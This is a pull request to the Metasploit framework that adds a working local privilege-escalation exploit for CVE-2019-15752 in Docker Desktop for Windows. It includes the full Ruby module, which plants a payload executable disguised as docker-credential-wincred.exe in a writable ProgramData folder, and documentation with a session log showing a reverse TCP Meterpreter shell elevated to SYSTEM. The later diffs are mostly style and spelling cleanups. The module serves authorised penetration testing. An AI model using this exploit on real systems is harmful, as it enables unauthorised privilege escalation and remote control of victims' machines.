### PR TITLE
First swipe at CVE-2019-15752

### DIFF
--- a/documentation/modules/exploit/windows/local/docker_credential_wincred.md
+++ b/documentation/modules/exploit/windows/local/docker_credential_wincred.md
@@ -5,7 +5,7 @@
 
 ## Verification Steps
 
-  1. Docker Desktop Community Edition before 2.1.0.1
+  1. Install Docker Desktop Community Edition before 2.1.0.1
   2. Start msfconsole
   3. Get a session with basic privileges
   4. Do: ```use exploit/windows/local/docker_credential_wincred```

--- a/documentation/modules/exploit/windows/local/docker_credential_wincred.md
+++ b/documentation/modules/exploit/windows/local/docker_credential_wincred.md
@@ -11,7 +11,8 @@
   4. Do: ```use exploit/windows/local/docker_credential_wincred```
   5. Do: ```set SESSION <sess_no>```
   6. Do: ```run```
-  7. You should get a shell you can elevate with ```getsystem```.
+  7. Using an administrator cmd shell on the target, run ```docker login``
+  8. You should get a shell you can elevate with ```getsystem```.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/windows/local/docker_credential_wincred.md
+++ b/documentation/modules/exploit/windows/local/docker_credential_wincred.md
@@ -1,0 +1,75 @@
+## Vulnerable Application
+
+  Docker Desktop Community Edition before 2.1.0.1
+  https://download.docker.com/win/stable/28905/Docker%20for%20Windows%20Installer.exe
+
+## Verification Steps
+
+  1. Docker Desktop Community Edition before 2.1.0.1
+  2. Start msfconsole
+  3. Get a session with basic privileges
+  4. Do: ```use exploit/windows/local/docker_credential_wincred```
+  5. Do: ```set SESSION <sess_no>```
+  6. Do: ```run```
+  7. You should get a shell you can elevate with ```getsystem```.
+
+## Scenarios
+
+### Tested on Docker Community Edition 2.0.0.0 running on Windows 10x64 Release 1803
+
+  ```
+msf5 exploit(windows/local/docker_credential_wincred) > show options
+
+Module options (exploit/windows/local/docker_credential_wincred):
+
+   Name         Current Setting                            Required  Description
+   ----         ---------------                            --------  -----------
+   PROGRAMDATA  C:\ProgramData\DockerDesktop\version-bin\  no        Path to docker version-bin.
+   SESSION                                                 yes       The session to run this module on.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf5 exploit(windows/local/docker_credential_wincred) > set session 1
+session => 1
+msf5 exploit(windows/local/docker_credential_wincred) > check
+
+[*] Docker version 18.09.0, build 4d60db4
+[*] The target appears to be vulnerable.
+msf5 exploit(windows/local/docker_credential_wincred) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] Docker version 18.09.0, build 4d60db4
+[*] UAC is Enabled, checking level...
+[*] Checking admin status...
+[+] Part of Administrators group! Continuing...
+[+] UAC is set to Default
+[+] BypassUAC can bypass this setting, continuing...
+[*] payload_pathname = C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
+[*] Making Payload
+[*] Uploading Payload to C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
+[*] Payload Upload Complete
+[*] Waiting for user to attemp to login
+[*] Sending stage (180291 bytes) to 192.168.132.125
+[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49766) at 2020-04-15 16:32:09 -0500
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: DESKTOP-D1E425Q\msfuser
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```

--- a/documentation/modules/exploit/windows/local/docker_credential_wincred.md
+++ b/documentation/modules/exploit/windows/local/docker_credential_wincred.md
@@ -11,7 +11,7 @@
   4. Do: ```use exploit/windows/local/docker_credential_wincred```
   5. Do: ```set SESSION <sess_no>```
   6. Do: ```run```
-  7. Using an administrator cmd shell on the target, run ```docker login``
+  7. Using an administrator cmd shell on the target, run ```docker login```
   8. You should get a shell you can elevate with ```getsystem```.
 
 ## Scenarios

--- a/modules/exploits/windows/local/docker_credential_wincred.rb
+++ b/modules/exploits/windows/local/docker_credential_wincred.rb
@@ -15,11 +15,11 @@ class MetasploitModule < Msf::Exploit::Local
     super(
       update_info(
         info,
-        'Name' => 'Docker-Credential-Wincred.exe priviledge escalation',
+        'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',
         'Description' => %q{
           This exploit leverages a vulnerability in docker desktop
           community editions prior to 2.1.0.1 where an attacker can write
-          a payload to a lower-priviledged area to be executed
+          a payload to a lower-privileged area to be executed
           automatically by the docker user at login.
         },
         'License' => MSF_LICENSE,
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
     register_options(
-      [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', 'C:\\ProgramData\\DockerDesktop\\version-bin\\'])]
+      [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]
     )
   end
 
@@ -85,7 +85,6 @@ class MetasploitModule < Msf::Exploit::Local
     # make payload
     payload_name = 'docker-credential-wincred.exe'
     payload_pathname = datastore['PROGRAMDATA'] + '\\' + payload_name
-    vprint_status('payload_pathname = ' + payload_pathname)
     vprint_status('Making Payload')
     payload = generate_payload_exe
 
@@ -93,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Local
     vprint_status("Uploading Payload to #{payload_pathname}")
     write_file(payload_pathname, payload)
     vprint_status('Payload Upload Complete')
-    print_status('Waiting for user to attemp to login')
+    print_status('Waiting for user to attempt to login')
   end
 
   def check_permissions!

--- a/modules/exploits/windows/local/docker_credential_wincred.rb
+++ b/modules/exploits/windows/local/docker_credential_wincred.rb
@@ -15,31 +15,31 @@ class MetasploitModule < Msf::Exploit::Local
     super(
       update_info(
         info,
-        'Name'          => 'Docker-Credential-Wincred.exe priviledge escalation',
-        'Description'   => %q{
+        'Name' => 'Docker-Credential-Wincred.exe priviledge escalation',
+        'Description' => %q{
           This exploit leverages a vulnerability in docker desktop
           community editions prior to 2.1.0.1 where an attacker can write
           a payload to a lower-priviledged area to be executed
           automatically by the docker user at login.
         },
-        'License'       => MSF_LICENSE,
-        'Author'        => [
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Morgan Roman', # discovery
-          'bwatters-r7',  # metasploit module
+          'bwatters-r7', # metasploit module
         ],
-        'Platform'       => ['win'],
-        'SessionTypes'   => ['meterpreter'],
-        'Targets'        => [[ 'Automatic', {} ]],
-        'DefaultTarget'  => 0,
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Targets' => [[ 'Automatic', {} ]],
+        'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'WfsDelay'     => 15
+          'WfsDelay' => 15
         },
         'DisclosureDate' => '2019-07-05',
-        'Notes'          =>
+        'Notes' =>
         {
-          'SideEffects'    => [ ARTIFACTS_ON_DISK ]
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
         },
-        'References'    => [
+        'References' => [
           ['CVE', '2019-15752'],
           ['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']
         ]

--- a/modules/exploits/windows/local/docker_credential_wincred.rb
+++ b/modules/exploits/windows/local/docker_credential_wincred.rb
@@ -1,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ManualRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Post::Windows::Priv
+  include Post::Windows::Runas
+
+  def initialize(info = {})
+    super(
+      update_info(info,
+        'Name'          => 'Docker-Credential-Wincred.exe priviledge  escallation',
+        'Description'   => %q(
+        This exploit leverages a vulnerability in docker desktop
+        community editions prior to 2.1.0.1 where an attacker can write
+        a payload to a lower-priviledged area to be executed
+        automatically by the docker user at login.
+        ),
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+          'Morgan Roman',   # discovery
+          'bwatters-r7',    # metasploit module
+        ],
+        'Platform'      => ['win'],
+        'SessionTypes'  => ['meterpreter'],
+        'Targets'       => [[ 'Automatic', {} ]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'WfsDelay'     => 15
+        },
+        'DisclosureDate'  => '2019-07-05',
+        'Notes'           =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        },
+        'References'    => [
+          ['CVE', '2019-15752'],
+          ['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']
+        ]
+      )
+    )
+    register_options(
+      [OptString.new('PROGRAMDATA', [true, "Path to docker version-bin.", "C:\\ProgramData\\DockerDesktop\\version-bin\\"])]
+    )
+  end
+  def get_version
+    output = cmd_exec("cmd.exe", "/c docker -v")
+    vprint_status(output)
+    version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0]
+    version = Gem::Version.new(version_string.split(".").map(&:to_i).join('.'))
+  end
+
+  def check
+    if get_version <= Gem::Version.new('18.09.0')
+      return CheckCode::Appears
+    end
+    CheckCode::Safe
+  end
+
+  def exploit
+    check_permissions!
+    case get_uac_level
+    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+      fail_with(Failure::NotVulnerable,
+                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
+    when UAC_DEFAULT
+      print_good('UAC is set to Default')
+      print_good('BypassUAC can bypass this setting, continuing...')
+    when UAC_NO_PROMPT
+      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+      shell_execute_exe
+      return
+    end
+
+    # make payload
+    payload_name = 'docker-credential-wincred.exe'
+    payload_pathname = datastore['PROGRAMDATA'] + '\\' + payload_name
+    vprint_status("payload_pathname = " + payload_pathname)
+    vprint_status("Making Payload")
+    payload = generate_payload_exe
+
+    # upload Payload
+    vprint_status("Uploading Payload to #{payload_pathname}")
+    write_file(payload_pathname, payload)
+    vprint_status("Payload Upload Complete")
+    print_status("Waiting for user to attemp to login")
+  end
+
+  def check_permissions!
+    unless check == Exploit::CheckCode::Appears
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    end
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+    # Check if you are an admin
+    # is_in_admin_group can be nil, true, or false
+  end
+end

--- a/modules/exploits/windows/local/docker_credential_wincred.rb
+++ b/modules/exploits/windows/local/docker_credential_wincred.rb
@@ -13,30 +13,31 @@ class MetasploitModule < Msf::Exploit::Local
 
   def initialize(info = {})
     super(
-      update_info(info,
-        'Name'          => 'Docker-Credential-Wincred.exe priviledge  escallation',
-        'Description'   => %q(
-        This exploit leverages a vulnerability in docker desktop
-        community editions prior to 2.1.0.1 where an attacker can write
-        a payload to a lower-priviledged area to be executed
-        automatically by the docker user at login.
-        ),
+      update_info(
+        info,
+        'Name'          => 'Docker-Credential-Wincred.exe priviledge escalation',
+        'Description'   => %q{
+          This exploit leverages a vulnerability in docker desktop
+          community editions prior to 2.1.0.1 where an attacker can write
+          a payload to a lower-priviledged area to be executed
+          automatically by the docker user at login.
+        },
         'License'       => MSF_LICENSE,
         'Author'        => [
-          'Morgan Roman',   # discovery
-          'bwatters-r7',    # metasploit module
+          'Morgan Roman', # discovery
+          'bwatters-r7',  # metasploit module
         ],
-        'Platform'      => ['win'],
-        'SessionTypes'  => ['meterpreter'],
-        'Targets'       => [[ 'Automatic', {} ]],
-        'DefaultTarget' => 0,
+        'Platform'       => ['win'],
+        'SessionTypes'   => ['meterpreter'],
+        'Targets'        => [[ 'Automatic', {} ]],
+        'DefaultTarget'  => 0,
         'DefaultOptions' => {
           'WfsDelay'     => 15
         },
-        'DisclosureDate'  => '2019-07-05',
-        'Notes'           =>
+        'DisclosureDate' => '2019-07-05',
+        'Notes'          =>
         {
-          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+          'SideEffects'    => [ ARTIFACTS_ON_DISK ]
         },
         'References'    => [
           ['CVE', '2019-15752'],
@@ -45,20 +46,22 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
     register_options(
-      [OptString.new('PROGRAMDATA', [true, "Path to docker version-bin.", "C:\\ProgramData\\DockerDesktop\\version-bin\\"])]
+      [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', 'C:\\ProgramData\\DockerDesktop\\version-bin\\'])]
     )
   end
-  def get_version
-    output = cmd_exec("cmd.exe", "/c docker -v")
+
+  def docker_version
+    output = cmd_exec('cmd.exe', '/c docker -v')
     vprint_status(output)
     version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0]
-    version = Gem::Version.new(version_string.split(".").map(&:to_i).join('.'))
+    Gem::Version.new(version_string.split('.').map(&:to_i).join('.'))
   end
 
   def check
-    if get_version <= Gem::Version.new('18.09.0')
+    if docker_version <= Gem::Version.new('18.09.0')
       return CheckCode::Appears
     end
+
     CheckCode::Safe
   end
 
@@ -82,20 +85,20 @@ class MetasploitModule < Msf::Exploit::Local
     # make payload
     payload_name = 'docker-credential-wincred.exe'
     payload_pathname = datastore['PROGRAMDATA'] + '\\' + payload_name
-    vprint_status("payload_pathname = " + payload_pathname)
-    vprint_status("Making Payload")
+    vprint_status('payload_pathname = ' + payload_pathname)
+    vprint_status('Making Payload')
     payload = generate_payload_exe
 
     # upload Payload
     vprint_status("Uploading Payload to #{payload_pathname}")
     write_file(payload_pathname, payload)
-    vprint_status("Payload Upload Complete")
-    print_status("Waiting for user to attemp to login")
+    vprint_status('Payload Upload Complete')
+    print_status('Waiting for user to attemp to login')
   end
 
   def check_permissions!
     unless check == Exploit::CheckCode::Appears
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
     end
     fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
     # Check if you are an admin


### PR DESCRIPTION
This adds a trivial file write exploit for docker community edition <= 2.1.0.0
Fixes https://github.com/rapid7/metasploit-framework/issues/13258
## Verification
Vulnerable software : https://download.docker.com/win/stable/28905/Docker%20for%20Windows%20Installer.exe

- [ ] Install Docker Desktop Community Edition before 2.1.0.1
- [ ] Start msfconsole
- [ ] Get a session with basic privileges
- [ ] Do: ```use exploit/windows/local/docker_credential_wincred```
- [ ] Do: ```set SESSION <sess_no>```
- [ ] Do: ```run```
- [ ] Using an administrator cmd shell on the target, run ```docker login``
- [ ] You should get a shell you can elevate with ```getsystem```.
